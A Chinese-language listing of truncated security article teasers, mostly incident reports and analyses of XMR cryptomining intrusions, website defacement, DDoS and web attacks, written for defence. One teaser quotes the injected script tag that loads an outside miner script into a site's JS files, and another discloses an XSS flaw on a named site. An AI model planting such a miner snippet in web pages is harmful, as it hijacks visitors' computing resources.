发现: 网站首页被恶意更改 网站的关键词和描述被恶意更改 服务器和只要访问此服务器上的网页cup 直线上升100% 排查代码发现js 文件被恶意更改,访问了挖矿网站 操作:删除js 里面的恶意代码,更改了账号. 网站查询得知:网站被XMR 恶意挖矿,服务器已经被攻击. 建议措施: (1)账号加固: (2)系统资源.网络.进程监控: (3)检查系统是否有恶意资源滥用情况(ELF挖矿程序): (4)检查系统是否有恶意JS网页挖矿脚本(网页挖矿脚本): (5)其他 附带:网络说明 https://ww…

一.登录 攻击者如何登录系统未能查出,所有日志已被清除.为防万一,把系统中没用的用户都删掉并修改其他用户密码. 二.被攻击后的表象 1.服务器资源被大量占用,资源占用率飙升: 2.服务器所有JS文件被篡改,向输出页面增加了一个script标签(document.write('<script src="http://t.cn/EvlonFh"></script><script>OMINEId("e02cf4ce91284dab9bc3fc4c…

前言 数字货币因其技术去中性化和经济价值等属性,逐渐成为大众关注的焦点,同时通过恶意挖矿获取数字货币是黑灰色产业获取收益的重要途径.本文简析通过蜜罐获取的XMR恶意挖矿事件:攻击者通过爆破SSH获取系统权限,配置root用户免密登录,并下载及执行XMR 挖矿程序,及XMR 网页挖矿程序.XMR挖矿程序耗肉鸡CPU/GPU资源,网页挖矿程序耗访问肉鸡服务器JS 网页的客户端资源 . 2018年10月11日,攻击者使用恶意IP(223.89.72.8)暴力破解Victim的SSH服务成功,获取系统账…

门罗币(Monero 或 XMR),它是一个非常注重于隐私.匿名性和不可跟踪的加密数字货币.只需在网页中配置好js脚本,打开网页就可以挖矿,是一种非常简单的挖矿方式,而通过这种恶意挖矿获取数字货币是黑灰色产业获取收益的重要途径. 现象描述 利用XMR恶意挖矿,会大量占用用户的CPU资源,严重影响了网站的用户体验. 从08/09日0点开始,局域网内某IP访问网站页面会触发安全预警,只要访问此服务器上的网页,CPU直线上升100% 问题解析 通过获取恶意网页url,对网页页面进行分析,发现网站页面被…

转自:https://www.360zhijia.com/anquan/417114.html 0x01 快速特征排查 TOP显示CPU占用高,但是没有高占用的进程 存在与未知服务器13531端口建立的TCP连接 文件/etc/ld.so.preload中指向了/usr/local/lib/libntp.so 存在可疑执行base64编码的python进程 0x02 快速清除 #!/bin/bash ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v g…

DDOS的攻击原理和如何防护网站和游戏恶意攻击                 1-DDOS全名是Distribution Denial of Service (分布式拒绝服务攻击),很多DOS攻击源一起 攻击某台服务器就组成了DDOS攻击.在中国,DDOS 最早可追溯到1996年,2002年开发频繁出现,2003 年已经初具规模.当时网络带宽普遍比较小,攻击量一般都不会超过100M,国内几乎没有防护的方法 和产品. 而且攻击源IP都是伪造的,无法找到攻击源.一个硬件配置很好的网站,每秒几兆的攻…

最近这两天以来,服务器一致声音很响.本来以为有同事在运行大的程序,结果后来发现持续很长时间都是这样,并没有停的样子.后来查了一下,发现有几个可疑进程导致,干掉之后,果然服务器静悄悄了. 但是,问题并没有结束,过了一会儿,服务器又开始轰鸣了,查找了一下,这里简单记录一下. 1.查看top结果,可见如下情况: top - :: up days, :, users, load average: 80.62, 78.60, 77.78 Tasks: total, running, sleeping, s…

背景 近期通过流量告警发现多起外连矿池的告警,均外连至43.249.204.231 威胁情报信息如下: 系统表象 1.通过ps -ef|grep osascript发现在/library/LaunchAgents/文件下均有恶意挖矿plist文件,主要为/library/LaunchAgents/com.apple.00.plist等形式,且plist已加密.有部分MAC还会存在一个下述所示的明文指向性plist文件,其在每次开机时通过osascript来执行AppleScript脚本来运行加密…

一 基本情况 1.1  简要 此事件是去年应急处置时完成的报告,距今有半年时间了.一直存在电脑里,最近准备完善应急响应中遇到的各类安全事件,这篇文章作为这一系列的开端. 对于 Linux 安全检查,个人上段时间写了个 shell 用于一键进行 Linux 安全检查,本文对 Linux 的检查使用相关脚本均可实现,相关链接如下: https://mp.weixin.qq.com/s/S0OmDRU6uQo8LBBK-GUAaQ https://github.com/T0xst/linux 1.2…

简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患. 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者). 本次事件具有两个特点:一是ImposterMi…

Trojan.Miner.gbq挖矿病毒分析报告 https://www.freebuf.com/articles/network/196594.html 竟然还有端口转发... 这哥们.. 江民安全实验室2019-03-04共13635人围观 ,发现 1 个不明物体网络安全 2018年12月一款通过驱动人生升级通道下发传播的木马爆发,该木马同时利用了永恒之蓝高危漏洞进行传播,最终导致了仅2个小时受攻击的用户就高达10万,造成了严重的危害. 一.病毒信息 病毒名称:Trojan.Miner.gb…

注:以下所有操作均在CentOS 7.2 x86_64位系统下完成. 今天突然收到“阿里云”的告警短信: 尊敬的****:云盾云安全中心检测到您的服务器:*.*.*.*(app)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警查看事件详情,并根据事件建议的方案进行处理. 于是登上“云盾云安全中心”查看,发现安全提示: 点进去查看详细信息: 网上查了下,发现这是一款在Linux/Windows双平台的挖矿病毒木马,该木马是通过Redis漏洞传播的挖矿木马DDG的变种,使用Go…

概述 近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进行牟利.该挖矿程序会大肆抢占服务器CPU资源进行门罗币的挖掘,造成服务器卡顿,严重影响正常业务运行,甚至造成业务终端.关于该蠕虫最早曝光于2018年7月,蠕虫自出现后频繁更新,陆续加入多达数十种的的攻击方式,可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序.建议用户及时排查自身主机是否…

近日,阿里云安全发现了一个使用未授权访问漏洞部署恶意Docker镜像进行挖矿的僵尸网络团伙.我们给这一团伙取名为Xulu,因为该团伙使用这个字符串作为挖矿时的用户名. Xulu并不是第一个攻击Docker的恶意挖矿团伙,但它不同于其他僵尸网络.Xulu感染一台服务器后,并不对外进行大规模扫描,而是使用OSINT技术,即利用开源情报,动态地从shodan网站获得可能的“猎物”ip列表. 此外,Xulu僵尸网络将自己的服务器放在Tor洋葱网络中,这使得对幕后黑手的追溯变得更加困难. 会挖矿的恶意Do…

摘要:我们的服务器又出入侵事故了.有客户的 html 网页底部被插入了一段 js 脚本,导致访客打开网页时被杀毒软件警告网站上有恶意代码.在黑链 SEO 中这是常见的手法,但奇特的地方就在于我们这次捕获到的代码,会根据当前的时间戳生成一个(伪)随机域名,然后定... 我们的服务器又出入侵事故了.有客户的 html 网页底部被插入了一段 js 脚本,导致访客打开网页时被杀毒软件警告网站上有恶意代码.在黑链 SEO 中这是常见的手法,但奇特的地方就在于我们这次捕获到的代码,会根据当前的时间戳生成一个…

Author: Charlie 个人微博:http://YinYongYou.com 转载请注明出处. 工作过程纯粹手贱,测试了一下.然后发现了这么一个东西.有心利用能造成大范围影响.如可以自由修改用户信息. 漏洞存在文件:*.b2b.youboy.com/framephoto.html  [用户商铺的framephoto.html 文件均存在] 成因:没有对提交的参数 path 和 t 的值进行过滤就插入到网页. 漏洞证明: 看到这里,懂的同学就知道弹出那个框是什么意思了.不懂的继续往下看.看…

刚上班发现有些服务跑不起来,进入服务器查看原因: 第一部分: 一,#top 因为是刚被我kill 掉一次,kill 掉等会还会自启动,之前yam 进程占cpu 是200% 二,# vim /etc/rc.local   看下加入开机自启的内容,将它删掉保存. 三,查找yam 进程的位置,修改它的权限. 当修改权限的时候回提示,不让执行这个权限,它是用了提权:chattr 四,然后过滤出他的进程,将其干掉. 五. 当top时候过滤出wipefs 这个进程的时候: 1.  find / -name…

2018 年的文章, Using deep neural networks to hunt malicious TLS certificates from:https://techxplore.com/news/2018-10-deep-neural-networks-malicious-tls.html 使用LSTM对恶意证书进行分类,准确率94% 下面是介绍. Moreover, encryption can give online users a false sense of securi…

一.网站被黑的类型有哪些 1.网站挂木马  :通过网站后台 FTP等植入恶意代码 2.网站域名被恶意泛解析 3.跳转 4.百度快照劫持:黑客劫持快照在你不工作的时候进入你的网站的,一般是凌晨1点到5.6点这段时间.现在的高科技比较发达,他们有一定的方法来进入你的网站后台,把网站的mate标签和title找成他们网站相关的内容,再等到蜘蛛抓取之后到凌晨把原来的信息再换回来,这样神不知鬼不觉,你也不会很轻易的发现什么.因此,第二天的快照就会变成劫持者的网站,这就导致了你的快照被劫持. 网站快照劫持的…

20145208 蔡野 <网络对抗>Exp4 恶意代码分析 问题回答 总结一下监控一个系统通常需要监控什么.用什么来监控. 监控一个系统通常需要监控这个系统的注册表,进程,端口,服务还有文件. 使用一些软件读取系统的注册表,进程表等信息来实现实时监测他们的变动. 如果在工作中怀疑一台主机上有恶意代码,请设计下你准备如何找到对应进程.恶意代码相关文件. 重启计算机,并对计算机的注册表,进程,端口,服务等内容进行检测,并使用抓包软件进行抓包,通过观察注册表,进程等内容的变化筛选出可疑的对象,然后针…

Nginx 服务绑定域名 https://help.aliyun.com/knowledge_detail/41091.html?spm=a2c4e.11155515.0.0.4lvCpF 以 YUM 安装的 Nginx 为例: 执行命令 vi /etc/nginx/nginx.conf 编辑 Nginx 的配置文件,将默认的server {...} 配置修改为以下内容: server { listen 80 default_server; server_name www.123.com; ro…

大型网站技术架构(四)--核心架构要素   作者:13GitHub:https://github.com/ZHENFENG13版权声明:本文为原创文章,未经允许不得转载.此篇已收录至<大型网站技术架构:核心原理与案例分析>读书笔记系列,点击访问该目录获取完整内容. 前言 所谓架构,一种通俗的说法就是“最高层次的规划,难以改变的决定”,这些规划和决定奠定了事物未来发展的方向和最终的蓝图. 而软件架构即“有关软件整体结构与组件的抽象描述,用于指导大型软件系统各方面的设计”. 一般来说软件架构需要关…

恶意域名指传播蠕虫.病毒和特洛伊木马或是进行诈骗.色情内容传播等不法行为的网站域名. 恶意域名指传播蠕虫.病毒和特洛伊木马或是进行诈骗.色情内容传播等不法行为的网站域名.本文面临能够的挑战,就是恶意网站经营者所使用的各种技术.近年来,FFSN和DGA技术使得网络攻击更加隐蔽,隐患更难被清除. 现网发现的DGA色情域名示例:api.e9ba38a7db7007625cc0ed0dd743c31b.com False ('', '', '', '', '', '', '', "[u'uncatego…

百度谷歌先后发声明倡导站长们使用https链接,同样的网站,https站点要比http站点拥有更好的排名权重.https已经是网站SEO必须要考虑的环节之一了,而https的必要条件就是安装SSL证书. 百度对https站点的扶持态度公告: 在百度的站长资源平台有https认证入口,方便https的收录: 1. HTTPS协议的站点信息更加安全,同时可降低网站被劫持的风险,如网站同时存在HTTP和HTTPS站点,可使用本工具进行认证,便于百度搜索识别网站HTTP与HTTPS之间的对应关系,识别成…

网站首页被非法篡改,是的,就是你一打开网站就知道自己的网站出现了安全问题,网站程序存在严重的安全漏洞,攻击者通过上传脚本木马,从而对网站内容进行篡改.而这种篡改事件在某些场景下,会被无限放大. 现象描述 网站首页被恶意篡改,比如复制原来的图片,PS一下,然后替换上去. 问题处理 1.确认篡改时间 通过对被篡改的图片进行查看,确认图片篡改时间为2018年04月18日 19:24:07 . 2.访问日志溯源 通过图片修改的时间节点,发现可疑IP:113.xx.xx.24 (代理IP,无法追溯真实来源…

新闻源网站一般权重较高,收录快,能够被搜索引擎优先收录,是黑灰产推广引流的必争之地,很容易成为被攻击的对象.被黑以后主要挂的不良信息内容主要是博彩六合彩等赌博类内容,新闻源网站程序无论是自主开发的还是开源程序,都有被黑的可能,开源程序更容易被黑. 现象描述: 某新闻源网站首页广告链接被劫持到菠菜网站 有三个广告专题,链接形式如下: ​ http://www.xxx.cn/zhuanti/yyysc/index.shtml ​ http://www.xxx.cn/zhuanti/wwwsc/ind…

常见Web应用攻击类型有:webshell.SQL注入.文件包含.CC攻击.XSS跨站脚本攻击.敏感文件访问.远程命令.恶意扫描.代码执行.恶意采集.特殊攻击.其他攻击十二种攻击类型. 如何查看网站遭受的Web应用攻击? (请参照以下步骤:) 访问知道创宇云安全: 注册账号登陆控制台: 前往域名管理->报表: 在Web应用攻击统计子页下,查看网站遭受的Web应用攻击: 点击攻击类型分布->攻击拦截趋势的“❔”查看攻击类型名词解释说明,也可参照下文说明. Webshell Webshell是一种…

近日,阿里云安全团队发布了<2018年云上挖矿分析报告>.该报告以阿里云2018年的攻防数据为基础,对恶意挖矿态势进行了分析,并为个人和企业提出了合理的安全防护建议. 报告指出,尽管加密货币的价格在2018年经历了暴跌,但挖矿仍是网络黑产团伙在入侵服务器之后最直接的变现手段,越来越多的0-Day/N-Day漏洞在公布后的极短时间内就被用于入侵挖矿,黑产团伙利用漏洞发起攻击进行挖矿的趋势仍将持续. 以下是报告部分内容,下载报告完整版:https://yq.aliyun.com/download/…

本文通过使用机器学习算法来检测HTTP的恶意外连流量,算法通过学习恶意样本间的相似性将各个恶意家族的恶意流量聚类为不同的模板.并可以通过模板发现未知的恶意流量.实验显示算法有较好的检测率和泛化能力. 0×00背景 攻击者为控制远程的受害主机,必定有一个和被控主机的连接过程,一般是通过在被控主机中植入后门等手段,由受控主机主动发出连接请求.该连接产生的流量就是恶意外连流量,如图1.1所示.目前检测恶意外连流量的主要方式有两种,一种是基于黑名单过滤恶意域名,另一种是使用规则匹配恶意外连流量.这两种方…

网站的安全性对seo优化至关重要    作者:智狐zhihuseo 从大的范围来看,网站安全性能也属于seo的范畴之一.域名被恶意泛解析就是网站安全性能低下的特征之一,如果网站域名被恶意泛解析,会直接伤害网站的seo流量,防止网站被不怀好意的人利用,采用有效方法加固网站安全,也是优化工作者的必要工作. 一:从原因来看,域名是否被恶意泛解析,与网站本身有关,也与域名服务商有关. 1:网站本身的问题. (1):在域名服务商购买域名的时候,注册的账号以及密码过于简单,可以通过弱口令简单获取到. (2)…